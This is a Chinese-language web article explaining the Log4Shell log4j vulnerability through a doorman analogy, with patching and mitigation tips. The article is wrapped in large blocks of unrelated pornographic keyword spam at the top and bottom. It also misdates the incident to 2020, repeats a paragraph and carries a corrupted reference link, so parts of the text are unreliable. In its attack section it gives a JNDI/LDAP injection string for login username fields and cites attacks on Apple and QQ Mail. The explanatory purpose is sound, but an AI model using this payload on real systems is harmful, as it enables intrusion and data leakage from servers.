精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Log4Shell 漏洞到底是個啥?

安全 漏洞
在 12 月初,爆出了一個核彈級的系統漏洞,導致眾多互聯網公司內部服務器被發現,劫持,甚至植入程序。

 [[441965]]

2020 年的12月,勢必成為各個互聯網公司年度最深刻的記憶。

在 12 月初,爆出了一個核彈級的系統漏洞,導致眾多互聯網公司內部服務器被發現,劫持,甚至植入程序。

盡管目前已經出臺了修復補丁,但這個出現在最基礎的應用最廣泛的模塊 log4j 上的漏洞還是讓我們心有余悸。

為什么這么就沒有被發現,為什么這個漏洞如此嚴重,這個漏洞到底是怎么回事?……

什么樣的漏洞

log4j[1] 是 Java 標準庫的模塊,主要負責記錄各種日志,和 Python 中的 logging[2] 類似。

log4j 功能強大,可以支持各種場景的日志記錄需求,比如將日志輸出到終端,將日志記錄到文件,或者發送到日志服務器等等,可以說但凡需要記錄日志的地方,log4j 是最佳選擇。

正是由于這一點,log4j 才成為最常用的模塊,加上互聯網公司的基礎設施都是由 java 構建的,所以 log4j 深入到每個公司的角角落落。

log4j 就像一個兢兢業業,任勞任怨的門衛老大爺,一絲不茍的記錄著各種來訪信息,以便系統排查問題。

為什么這樣一個普通的,不起眼的模塊會爆出一個驚天漏洞呢?

為了說明這個情況,我借鑒 少數派 PlatyHsu 的比喻[3]做講解,即使你不會編程,不懂技術也可以理解。

門衛

前面我們說 log4j 是一個日志模塊,就像一個門衛老大爺,凡是進入里面的人,都需要在門衛處登記一下。

注意這里的登記不是驗證,只是簡單的記錄一下,比如誰,什么時候,什么目的等等,將這些信息記錄到日志里。

我們經常看到的 Web 系統的訪問日志,就是這個模塊負責產生的。

本來一切正常,但是在一些對性能要求很高的系統中,為了不讓日志記錄占用太多的時間(畢竟,停下來被詢問也是需要時間的),日志模塊里增加了一個事后處理的功能。

也就是說當訪問者很著急時,只要留下一個電話,讓門衛之后去詢問就好了。

這個設計有諸多好處,類似于異步處理,將記錄日志的過程分離出去,異步處理,這樣就不會影響主要流程的執行了。

但是,問題也是出在這里的。

詐騙電話

一些別有用心的人,就利用預留電話的機制,留下了詐騙電話。

當日志處理模塊,事后整理日志時,發現有一行寫了打電話詢問,于是就撥打了留下的電話,然后電話那頭說,恭喜你中獎了,獎品是一部手機,只要提供地址信息就可以免費郵寄過來,等等

這個日志模塊在完全不知情的情況下,就泄露了企業內部的信息,這些信息包括收件人,內部電話等等。

你可能會奇怪,為什么需要日志模塊撥打電話呢?到底是怎么撥打的電話,這里稍作展開一下。

日志模塊不是真的去撥打電話,而是日志記錄的機制中允許使用模板。

就像 Python 里的字符串模板一樣,在合成字符串時,可以用占位符代替實際內容,根據實際情況做出填充例如:

  1. strTemp = "Hello {name}" 
  2.  
  3. print(strTemp.format(name'Lily')) 
  4.  
  5. # 結果為:Hello Lily 

log4j 為了靈活,使用一個叫 JNDI[4](Java Naming and Directory Interface)的目錄查詢方法,這個方法可以支持 LDAP[5](輕型目錄訪問協議,Lightweight Directory Access Protocol)協議,對網絡上的輕型目標進行查詢。

LDAP 的格式為:

ldap://ldap.example.com/cn=John%20Appleseed

意思是向 ldap.example.com 發送一個請求,查詢名為 John Appleseed 這個人的信息。

重點來了:

LDAP 協議是可以進行網絡訪問的

到這里我們就會發現,當處理日志的程序,執行到需要替換日志模板的語句時,恰巧有時需要通過 LDAP 協議獲取信息的情況下,就會去訪問這個地址。

如果別有用心者,將這個地址作為一個陷阱,或者作為一個木馬程序的下載地址,就可以在服務器毫不知情的情況下,在暴漏服務器內部信息,甚至下載木馬程序到服務器上。

之前的很多報道已經指出,黑客利用這個漏洞,在服務器上安裝了挖礦程序。

如何實施

對于普通大眾來說,系統漏洞離我們很遠,即使知道這樣的漏洞存在,也不知如何發揮作用,也是因為這個原因,導致很多人對漏洞信息不敏感,以為自己不知道如何使用,別人也就不知道,這樣的想法會讓自己常常處于危險之中。

log4Shell 漏洞,實施起來簡單地讓人難以置信,甚至不需要使用什么攻擊工具,只需要在平臺的登錄頁面,填寫一個特別的用戶名即可。

例如在蘋果網站上,將用戶名寫成類似這樣的 ${jndi:ldap://ldap.example.com/a} 形式:

蘋果

當然 ldap 網站需要自己設置或者使用一個可以提供記錄訪問者信息的服務,就能看到蘋果內部的服務器信息了。

這里還有對 QQ 郵箱的攻擊示例:

QQ郵箱

只要在能訪問系統的地方,加上特殊的注入語句,就可以實施攻擊了,所以對漏洞的攻擊,并沒有想象中那么復雜,因此在發現漏洞時,要及時打補丁做補救,而不能因為自己不知如何實施而放之不管。

如何消除

當我們了解了整個過程,對于如何防止就很清晰了,如果這個漏洞沒有被及時修復,也可以采取一些措施防止信息泄露。

最容易想到的是防止系統對不了解的外網進行訪問。

就像給內部電話限制撥打長途一樣,對于超出范圍的呼叫做出限制。

第二可以通過參數設置禁止系統的中的 JNDI 通信協議,就是讓日志模塊中的 JNDI 失效。

還有就是下載補丁,修補漏洞。

給我們的啟示

漏洞修補很容易,但是造成這個漏洞的根源卻難以消除。

我們總是在易用性和安全性之間找到一個平衡點,而增加易用性和功能性的同時,會引入更多的不確定性,特別是當依賴層級加大,大量的間接依賴會使問題的復雜程度超出我們的想象。

log4Shell 因為其巨大的破壞性,一經發現,就被及時處理了,但可能還存在這樣那樣的依賴導致的問題,繼續存在。

因此我們在做系統擴展功能的時候,要特別注意因為依賴而導致的系統問題,很多時候命名覺得無關緊要的邊緣的功能,卻成了漏洞躲藏的絕佳場所。

總結

沒有一個純凈的環境,完美的世界,log4Shell 漏洞讓我更清楚地看到這個世界的真實 —— 漏洞無處不在!

我們能做的就是要提供防護意識,像預防新冠病毒一樣做好防護,不迷信,不謠傳,也不大意和忽視。

可能我們平時寫的代碼效用有限,如果沒有防護和安全意識,就像裸奔一樣。

幾年前筆者在 github 上發布一段代碼示例時,誤將實際環境的配置信息上傳了上去,過來一周左右,意識到問題時,服務器已經被人注入了挖礦程序!

很難想象一個默默無聞的更新會被人注意且利用了,所以防護意識是我們暢游于網絡的護身符。

比心!

很難想象一個默默無聞的更新會被人注意且利用了,所以防護意識是我們暢游于網絡的護身符。

比心!

參考資料

[1]log4j: https://logging.apache.org/log4j/2.x/

[2]logging: https://docs.python.org/zh-cn/3/library/logging.html

[3]少數派 PlatyHsu 的比喻: https://sspai.com/post/70394

[4]JNDI: https://baike.baidu.com/item/JNDI/3792442

[5]LDAP:https://baike.baidu.com/item/%E8%BD%BB%E5%9E%8B%E7%9B%AE%E5%BD%95%E8%AE%BF%E9%97%AE%E5%8D%8F%E8%AE%AEDFDFDFDFDFDFDFDFDFDFDFDFDFDFDFDFT56666666666666666666

 

責任編輯:武曉燕 來源: Python技術
相關推薦

2022-01-07 10:02:31

Log4j漏洞網絡攻擊網絡安全

2021-12-15 06:21:29

Log4Shell漏洞網絡攻擊

2022-01-06 11:55:02

Aquatic PanLog4Shell漏洞

2025-10-31 00:00:02

硅光光通信英偉達

2021-12-17 09:50:21

Log4Shell漏洞勒索軟件

2022-01-14 19:12:07

勒索軟件攻擊漏洞

2022-01-10 09:30:33

Java漏洞漏洞網絡攻擊

2025-10-29 07:33:13

2024-02-07 12:35:00

React并發模式concurrent

2022-01-28 12:07:29

Log4j漏洞網絡攻擊

2021-12-14 16:07:04

Log4Shell漏洞黑客

2022-05-04 08:38:32

Netty網絡框架

2021-05-11 07:30:58

JNIJavaAPI

2021-01-28 17:41:32

Github網站Pull Reques

2022-04-10 19:26:07

TypeScript類型語法

2021-12-22 09:54:48

黑客Log4Shell漏洞攻擊

2022-01-10 11:16:40

漏洞 Log4j2Jndi

2024-05-15 16:10:15

2024-07-12 15:08:23

Python@wraps函數

2024-08-26 14:23:56

點贊
收藏

51CTO技術棧公眾號

日韩在线视频网址| 57pao国产成永久免费视频| 日本免费一区二区三区最新| 日韩国产精品久久| 美女精品久久久| 久久精品女同亚洲女同13| 欧美一级二级视频| 亚洲成人av免费| 亚洲国产精品综合| 色哟哟国产精品色哟哟| 日本sm残虐另类| 国产最新精品视频| 日本不卡一区视频| 麻豆精品99| 欧美日韩成人综合在线一区二区| 久操网在线观看| 亚洲s色大片| 99久久久无码国产精品| 成人黄色免费在线观看| 中文字幕在线看人| 激情久久综合| xxxxx成人.com| 亚洲天堂久久新| 国产精品白丝av嫩草影院| 欧美日韩一二三区| 精品久久久噜噜噜噜久久图片 | 欧美国产日韩激情| 嫩草香蕉在线91一二三区| 2020国产精品| 国产三区二区一区久久| 国产成人精品白浆久久69| 日本aⅴ免费视频一区二区三区| 国语自产精品视频在线看一大j8| 最新av电影网站| 色综合蜜月久久综合网| 亚洲日韩欧美视频一区| 久久精品女同亚洲女同13| 中文字幕区一区二区三| 欧美一区二区三区日韩视频| 在线观看av日韩| 爱情电影社保片一区| 亚洲国产婷婷综合在线精品| 日韩精品一区二区三区电影| 免费超碰在线| 日韩一区日韩二区| 亚洲永久激情精品| 91福利在线视频| 欧美激情在线观看视频免费| 欧美日韩在线高清| 青青久在线视频| www日韩大片| 免费日韩av电影| 三级在线观看| xnxx国产精品| 日韩免费av一区二区三区| 亚洲av成人无码久久精品老人| 成人久久久精品乱码一区二区三区| 91人人爽人人爽人人精88v| 91成人一区二区三区| 久久国产精品72免费观看| 国产欧美日韩视频| 91成品人影院| 国产成人av影院| 国产精品一国产精品最新章节| 亚洲第一页在线观看| 成人禁用看黄a在线| 国产一区二区三区四区五区加勒比| 噜噜噜久久,亚洲精品国产品| 成人免费毛片aaaaa**| 精品国产一区二区三区四区vr| 日本黄色三级视频| 久久日一线二线三线suv| 日本黑人久久| 老司机福利在线视频| 一区二区三区91| 欧美亚洲精品一区二区| 亚洲综合在线电影| 56国语精品自产拍在线观看| 91精产国品一二三| 亚洲精品国产精品粉嫩| 中文字幕日韩av综合精品| 51精品免费网站| 在线欧美福利| 国产精品福利在线观看网址| 国产精品欧美亚洲| 成人国产精品免费网站| 日本免费一区二区三区| 秋霞午夜在线观看| 精品国产31久久久久久| 深夜黄色小视频| 成人性生交大片免费看96| 亚洲欧美国产精品| 欧美做爰啪啪xxxⅹ性| 欧美成人一品| 欧美亚洲视频在线看网址| 久久精品99北条麻妃| 国产精品一二三四五| 久久青青草原| 影音先锋男人资源在线| 欧美午夜美女看片| 亚洲高清av一区二区三区| 欧美男男freegayvideosroom| 中文字幕日韩专区| 国产成人精品av久久| 蜜臀av一区二区在线免费观看 | 四虎免费在线观看| 国产精品妹子av| 欧美无砖专区免费| 久久91视频| 精品无人区太爽高潮在线播放| 久草手机视频在线观看| 国产精品久久久久久久久久妞妞 | 亚洲天天综合网| 成人h动漫精品一区二区| 亚洲在线播放电影| 久久野战av| 亚洲国产美女精品久久久久∴| 国产天堂av在线| 热久久免费视频| 久久久国产精品一区二区三区| 伊人春色在线观看| 欧美三级午夜理伦三级中视频| 日韩av无码一区二区三区不卡| 希岛爱理一区二区三区| 国产精品久久久久久久久久久久久| 老熟妇高潮一区二区高清视频| 日韩美女视频一区| 天天操,天天操| 精品72久久久久中文字幕| 久久久视频在线| www.亚洲天堂.com| 亚洲欧美一区二区三区孕妇| 午夜宅男在线视频| 精品视频网站| 国产成人拍精品视频午夜网站| 日本高清视频免费观看| 亚洲电影一区二区三区| 国产精品一级无码| 国产精品v欧美精品v日本精品动漫| 国产欧美一区二区白浆黑人| h视频网站在线观看| 日本高清不卡在线观看| 中国美女乱淫免费看视频| 亚洲毛片网站| 久久久com| 国产免费不卡| 亚洲欧美日韩精品久久亚洲区 | 大桥未久一区二区| 亚洲国产91视频| zzijzzij亚洲日本成熟少妇| 中文字幕理论片| 中文一区一区三区高中清不卡| 亚洲性生活网站| 精品国产日韩欧美| 国产精品久久久久久久美男| h视频在线播放| 欧美日韩国产色站一区二区三区| 国产麻豆a毛片| 国产在线视频精品一区| 9191国产视频| 一区二区三区欧洲区| 91精品国产免费久久久久久| 天堂a√中文在线| 91久久一区二区| 国产传媒免费在线观看| 国产酒店精品激情| 青草青青在线视频| 亚洲国产合集| 成人妇女淫片aaaa视频| 日本高清在线观看视频| 亚洲国产小视频在线观看| 国产免费一级视频| 中文字幕亚洲一区二区av在线 | 欧美大胆a视频| 女人18毛片水真多18精品| 欧美性生交xxxxxdddd| 91av手机在线| 成人av免费在线| 热久久精品免费视频| 你懂的一区二区| 久久精品99| 国产一区二区| 欧美在线视频一区二区| 精品孕妇一区二区三区| 亚洲精品成人久久| 亚洲天堂手机版| 狠狠久久亚洲欧美专区| 人与动物性xxxx| 不卡在线视频中文字幕| 天天干天天操天天做| 亚洲啪啪91| 久久久一二三四| 小嫩嫩12欧美| 97人人澡人人爽| 国产极品久久久久久久久波多结野| 欧美成人精品影院| 黄色在线播放| 亚洲成年人在线| 在线免费看av片| 韩曰欧美视频免费观看| 日本免费网站视频| 91在线视频网址| 精品人妻一区二区三| 日韩电影免费一区| 男女视频网站在线观看| 91精品国产麻豆国产在线观看| 久久99欧美| 国产精品videossex| 成人网在线观看| 九色成人搞黄网站| 456亚洲影院| 国产黄色大片在线观看| www.99久久热国产日韩欧美.com| 视频二区在线| 亚洲白拍色综合图区| 国产美女永久免费| 欧美在线视频全部完| 天天爽夜夜爽夜夜爽精品| 亚洲黄色性网站| 国产极品美女在线| 中文字幕精品三区| 新91视频在线观看| 91在线精品一区二区| www.四虎精品| 国产成人久久精品77777最新版本 国产成人鲁色资源国产91色综 | 在线观看亚洲成人| 国产精品suv一区二区三区| 亚洲网友自拍偷拍| 久久久久久久中文字幕| 亚洲精品午夜久久久| 日韩一卡二卡在线观看| 国产精品毛片无遮挡高清| 国产aⅴ激情无码久久久无码| 99v久久综合狠狠综合久久| 这里只有精品在线观看视频| 国产大陆a不卡| 在线观看欧美一区二区| 国产呦精品一区二区三区网站| 中文字幕第38页| 美女看a上一区| 老司机久久精品| 美女视频网站久久| 日本中文字幕二区| 极品少妇xxxx精品少妇| 五月激情婷婷在线| 国产精品亚洲人在线观看| 久久精品一二三四| 国产成人av一区二区三区在线| 中文字幕一区二区三区人妻在线视频 | 国产精品入口66mio| 国产成人在线免费看| 亚洲少妇诱惑| 国产综合免费视频| 日韩精品一级中文字幕精品视频免费观看 | 欧美极品在线| 成人免费视频a| 榴莲视频成人app| 国产精品免费一区二区三区观看| 都市激情亚洲| 欧美一区少妇| 99成人在线视频| 99国产精品白浆在线观看免费| 亚洲国产婷婷| 黄色a级片免费| 免费xxxx性欧美18vr| 波多野结衣免费观看| 成人激情午夜影院| 美女久久久久久久久久| 中文字幕 久热精品 视频在线| 91精品国产高清一区二区三蜜臀| 亚洲国产毛片aaaaa无费看| 成人在线免费看视频| 欧美日韩亚洲综合在线| 亚洲黄色在线播放| 亚洲欧美制服中文字幕| 日本电影在线观看网站| 欧美精品成人在线| 三上悠亚国产精品一区二区三区| 国产精品日日做人人爱| 亚洲综合色婷婷在线观看| 女同一区二区| 911精品美国片911久久久| 青青草精品视频在线| 男人的j进女人的j一区| 日本泡妞xxxx免费视频软件| 91色综合久久久久婷婷| 黄大色黄女片18免费| 亚洲福利一区二区三区| 中文字幕一区二区免费| 精品国产凹凸成av人网站| 国产女主播在线直播| 欧美黑人xxxⅹ高潮交| 久久精品女人天堂av免费观看| 亚洲一区国产精品| 国产成人调教视频在线观看 | 欧美magnet| 96成人在线视频| 精品九九在线| 黄网站欧美内射| 激情综合色丁香一区二区| 男生裸体视频网站| 一级特黄大欧美久久久| 五月婷婷激情五月| 亚洲国产精品专区久久| 中文字幕伦理免费在线视频 | 91精品国产91| 亚洲精品66| 美乳视频一区二区| 在线成人h网| 北条麻妃亚洲一区| 国产精品久久免费看| 在线观看日韩中文字幕| 欧美成人一区二区三区在线观看| 北岛玲一区二区三区| 欧美一级淫片播放口| 91久久精品无嫩草影院| 在线视频91| 日本视频中文字幕一区二区三区| a天堂视频在线观看| 夜夜嗨av一区二区三区网页| 一级aaaa毛片| 一区二区三区四区精品| 欧美电影h版| 美女一区视频| 亚洲欧美清纯在线制服| 97香蕉碰碰人妻国产欧美| 亚洲国产你懂的| 可以免费观看的毛片| 欧美激情亚洲视频| 亚洲视频一起| 久久久99精品视频| 国产精品亚洲人在线观看| 欧美又粗又大又长| 91.com在线观看| www视频在线免费观看| 成人黄色大片在线免费观看| 国产高清一区二区| 日韩在线不卡一区| 中文字幕日韩欧美一区二区三区| 夜夜嗨aⅴ一区二区三区| 色小说视频一区| 爱情电影网av一区二区| japanese在线视频| 国产乱子伦一区二区三区国色天香| 午夜激情福利电影| 91精品中文字幕一区二区三区| 国产调教视频在线观看| 91久久极品少妇xxxxⅹ软件| 亚洲无线一线二线三线区别av| 国产精品99精品无码视亚| 一区二区三区在线不卡| 人妻一区二区三区| 久久人人爽人人爽人人片av高请| 国产一区二区三区不卡av| 欧美成人高潮一二区在线看| 91亚洲男人天堂| 日韩免费av网站| www.亚洲天堂| 日韩一区二区三区精品视频第3页| 免费cad大片在线观看| 成人av在线资源网站| 成年人视频在线免费看| 国产一区二区成人| 日韩欧国产精品一区综合无码| 51xx午夜影福利| av影院午夜一区| 波多野结衣二区三区| 欧美成人精品在线观看| 欧美理伦片在线播放| 91看片在线免费观看| 亚洲美腿欧美偷拍| 视频一区二区三区国产| 国产在线视频不卡| 影院欧美亚洲| 亚洲精品成人无码| 欧美一区二区女人| 台湾佬中文娱乐网欧美电影| 亚洲啪啪av| 成人久久18免费网站麻豆| 中文字幕免费观看| 欧美成人精品在线播放| 宅男在线一区| 污视频在线观看免费网站| 欧美日韩一区二区在线播放| 日本在线观看网站| 鲁丝一区二区三区免费| 精品一区二区三区视频| 五月婷婷激情网| 日韩网站免费观看| 五月综合久久| 亚洲一区二区三区三州| 91福利精品第一导航| 黄页网站大全在线免费观看| 色视频一区二区三区| 成人免费视频caoporn| 91欧美日韩麻豆精品| 555www成人网| 欧美天天在线| 人人澡人人澡人人看| 亚洲新声在线观看|